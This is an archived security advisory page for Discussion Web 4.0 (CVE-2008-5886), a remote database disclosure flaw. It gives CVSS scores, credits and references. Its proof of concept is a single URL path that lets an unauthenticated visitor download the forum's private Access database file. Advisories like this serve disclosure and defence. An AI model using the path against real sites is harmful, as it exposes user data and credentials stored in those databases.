Bug: Discussion Web v4 Remote Database Disclosure Vulnerability ( Ascii Version )

Search:
WLB2

Discussion Web v4 Remote Database Disclosure Vulnerability

Published
Credit
Risk
2009.01.12
Pouya_Server
Medium
CWE
CVE
Local
Remote
CWE-264
CVE-2008-5886
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
5/10
2.9/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
None
None

#########################################################
---------------------------------------------------------
Portal Name: Discussion Web
Version : 4.0
Vendor : http://www.takempis.com/aboutdiscussion.htm
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (DD)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/_private/discussion.mdb

---------------------------------

References:

http://xforce.iss.net/xforce/xfdb/47348
http://www.milw0rm.com/exploits/7445

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version